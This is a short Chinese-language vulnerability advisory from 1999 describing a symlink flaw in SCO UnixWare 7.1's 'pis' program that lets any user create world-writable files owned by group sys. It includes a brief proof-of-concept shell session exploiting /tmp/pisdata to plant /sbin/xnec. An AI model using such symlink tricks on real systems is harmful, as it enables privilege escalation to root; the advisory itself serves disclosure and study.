发布日期：1999-12-28
更新日期：1999-12-28

受影响系统：

UnixWare 7.1 （或其它版本）

描述：

---

    SCO UnixWare的"/usr/local/bin/pis"存在一个安全漏洞，它允许任何用户以"sys"组权限建立任意文件。再进一步获取根用户权限也就轻而易举了。
    通过建立/tmp/pisdata到任意所有组为sys的文件的符号链接，pis的输出会覆盖这个文件的内容。如果此符号链接指向的是不存在的文件（注意：对所在目录要有写权限），如/sbin/ls，pis将创建这个文件，访问权限为0666，所有者为攻击者，所有组为sys。




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

bash-2.02$ ls -dal /sbin
drwxrwxr-x    2 root     sys            3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw-    1 xnec     sys            5896 Dec 28 08:28 /sbin/xnec
bash-2.02$




建议：

---

    暂无。




浏览次数：6636
严重程度：0（网友投票）